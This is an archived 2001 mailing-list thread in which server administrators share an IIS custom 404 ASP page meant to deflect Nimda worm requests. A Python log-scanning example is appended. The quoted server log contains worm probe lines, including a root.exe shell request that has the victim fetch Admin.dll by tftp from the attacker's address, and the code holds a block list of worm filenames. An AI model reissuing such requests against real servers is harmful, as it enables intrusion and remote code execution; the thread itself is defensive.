Dear Ron:

I tried to implement the code you mentioned below but it seems I am still
getting some of those bad requests... see here..
this is the log file from imail server (standalone that is running win2k
server and IIS 5.0 with your ezsignup utility).

20010927 033141 216.254.88.229, , , GET /scripts/root.exe?/c+dir HTTP/1.0
20010927 033142 216.254.88.229, , , GET /scripts/root.exe?/c+tftp%20-i%20216.254.88.229%20GET%20Admin.dll%20Admin.dll HTTP/1.0
20010927 033142 216.254.88.229, , , GET /scripts/Admin.dll HTTP/1.0
20010927 033143 216.254.88.229, , , GET /MSADC/root.exe?/c+dir HTTP/1.0

Any ideas, maybe I haven't configured it properly?  I revised the code a bit
to redirect to the home page after 5 seconds... could that cause it?


here is my "version"


<%
 myRequest=Request.ServerVariables("QUERY_STRING")

 'A list of filenames virus looks for or in this case to protect

 myBadList="cmd.exe,root.exe,admin.dll,default.ida,.exe,.dll,.ida,.htr,.printer"

 'Detect a GET request from the Nimda virus and take appropriate action
 arrBadString=Split(myBadList,",")
 for i=0 to UBound(arrBadString)
        if inStr(myRequest,arrBadString(i))>0 then
                'turn offending server back on itself
                Response.redirect "http://127.0.0.1"
        end if
 next
 %>
 <HTML>
<HEAD>
 <META NAME="ROBOTS" CONTENT="NOINDEX">

<SCRIPT LANGUAGE="JAVASCRIPT">
var timerID="";
function loadPage()
   {
   clearTimeout(timerID);
   window.location.href="/";
   }
</SCRIPT>
<SCRIPT LANGUAGE="JAVASCRIPT1.1">
function loadPage()
   {
   clearTimeout(timerID);
   window.location.href="/";
   }
</SCRIPT>

<SCRIPT LANGUAGE="JAVASCRIPT1.2">
function loadPage()
   {
   clearTimeout(timerID);
   window.location.href="/";
   }
</SCRIPT>
<a href="/">Home Page</a>.
</HEAD>
<BODY BGCOLOR="#000000">

<BR><BR><BR><BR><BR>

<CENTER><STRONG><EM>
<FONT COLOR="#FFFF00" SIZE="+2">sorry..., that page is missing or has been
moved, <br>redirecting to home page.</FONT>
</EM></STRONG></CENTER>

<SCRIPT LANGUAGE="JAVASCRIPT">
timerID=setTimeout("loadPage()", 4500);
</SCRIPT>

</BODY>
</HTML>






-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]On Behalf Of Ron
Hornbaker
Sent: Friday, September 21, 2001 12:11 PM
To: [EMAIL PROTECTED]
Subject: RE: [imail] IIS Judo against Nimda's DoS attacks (was Fwd:
[isp-linux] Buaaa Haaa Ha Haaaaaaaaa...)


Great tip, Len. Here's the IIS version... just create a file in your web
root called something like "Custom404.asp", with this content (customize
the friendly part as much as you wish):

<%
'Custom404.asp page to thwart Nimda DoS attacks on IIS
'by Humankind Systems, Inc. http://hksi.net/
'No support or guarantees of any kind are granted with this
'code. Use at your own risk. Distribute freely.

'Get the entire URL requested
myRequest=Request.ServerVariables("QUERY_STRING")
'Detect a GET request from the Nimda virus and take appropriate action
if inStr(myRequest,"cmd.exe")>0 OR inStr(myRequest,"root.exe")>0 then
  'turn offending server back on itself
  Response.redirect "http://127.0.0.1"
end if
%>
<html>
<head>
<title>Page Not Found</title>
</head>
<body>
Sorry, but that page was not found on our server.
<p>
Here is a link back to our <a href="/">Home Page</a>.
</body>
</html>

Then go into your IIS properties on the default web site, to Custom
Errors, and customize the 404 error to use a URL. Enter "/Custom404.asp"
as the custom error. Test your server by entering URLs that won't be
found, and then enter some containing "cmd.exe" or "root.exe" in them.

This has the added benefit of being much smaller, kb-wise, than the
default 404 error page.


Ron Hornbaker
President/CTO
  .  .  .  .  .  .  .  .  .  .  .  .  http://humankindsystems.com
  .  .  .  .  .  .  .  .  .  .  .  .  w e  c o d e.  w e  c a r e.




> -----Original Message-----
> From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]On Behalf Of Len
> Conrad
> Sent: Friday, September 21, 2001 1:44 PM
> To: [EMAIL PROTECTED]; [EMAIL PROTECTED]
> Subject: [imail] Fwd: [isp-linux] Buaaa Haaa Ha Haaaaaaaaa...
>
>
> Below is a "judo" trick, using HTTP redirection for Apache, to
> deflect the
> nimda GETs back to the attacker.
>
> I suppose some of you MS aces could try to come up with
> equivalent for IIS?
>
> Len




______________________________________________________________________
The HKSI-IMail Admin List is hosted by........ Humankind Systems, Inc.
Questions, Comments or Complain like Hell.. mailto:[EMAIL PROTECTED]
Message Archive... http://www.tallylist.com/archives/index.cfm/mlist.4
To Manage your Subscription......... http://humankindsystems.com/lists
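
Added example (Python, not part of the original thread and not Humankind Systems' code): the substring check from the ASP pages above, run over the four log lines quoted in the first message. The log layout is inferred from those lines, the `192.0.2.10` request is constructed, and `ignore_case=False` reproduces the case-sensitive comparison that VBScript's `InStr` performs by default.

```python
import re
from urllib.parse import unquote

# Substrings taken from the poster's myBadList.
BAD_LIST = ("cmd.exe,root.exe,admin.dll,default.ida,"
            ".exe,.dll,.ida,.htr,.printer").split(",")

# Layout as seen in the post: "date time client-ip, , , METHOD target PROTOCOL"
LINE_RE = re.compile(r"^(\d{8}) (\d{6}) ([\d.]+), , , (\S+) (\S+) (HTTP/\d\.\d)$")

# The four log lines from the post (wrapped line rejoined), plus one
# constructed benign request from a documentation address.
SAMPLE_LOG = """\
20010927 033141 216.254.88.229, , , GET /scripts/root.exe?/c+dir HTTP/1.0
20010927 033142 216.254.88.229, , , GET /scripts/root.exe?/c+tftp%20-i%20216.254.88.229%20GET%20Admin.dll%20Admin.dll HTTP/1.0
20010927 033142 216.254.88.229, , , GET /scripts/Admin.dll HTTP/1.0
20010927 033143 216.254.88.229, , , GET /MSADC/root.exe?/c+dir HTTP/1.0
20010927 033150 192.0.2.10, , , GET /index.html HTTP/1.0
"""

def match_bad(target, ignore_case=True):
    """Return the bad-list entries found in a percent-decoded request target.

    ignore_case=False mirrors VBScript's default InStr (binary compare)."""
    decoded = unquote(target)
    if ignore_case:
        decoded = decoded.lower()
    return [bad for bad in BAD_LIST if bad in decoded]

def scan(log_text):
    """Map client IP -> list of (time, target, matched entries) for probe hits."""
    hits = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # skip lines that do not fit the layout
        _date, time, ip, _method, target, _proto = m.groups()
        matched = match_bad(target)
        if matched:
            hits.setdefault(ip, []).append((time, target, matched))
    return hits

if __name__ == "__main__":
    for ip, probes in scan(SAMPLE_LOG).items():
        print(ip, len(probes), "probe requests")
        for time, target, matched in probes:
            print("  ", time, target, "->", ", ".join(matched))
```

The log lines carry no response status, so a match shows that a probe arrived, not what the server returned for it.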



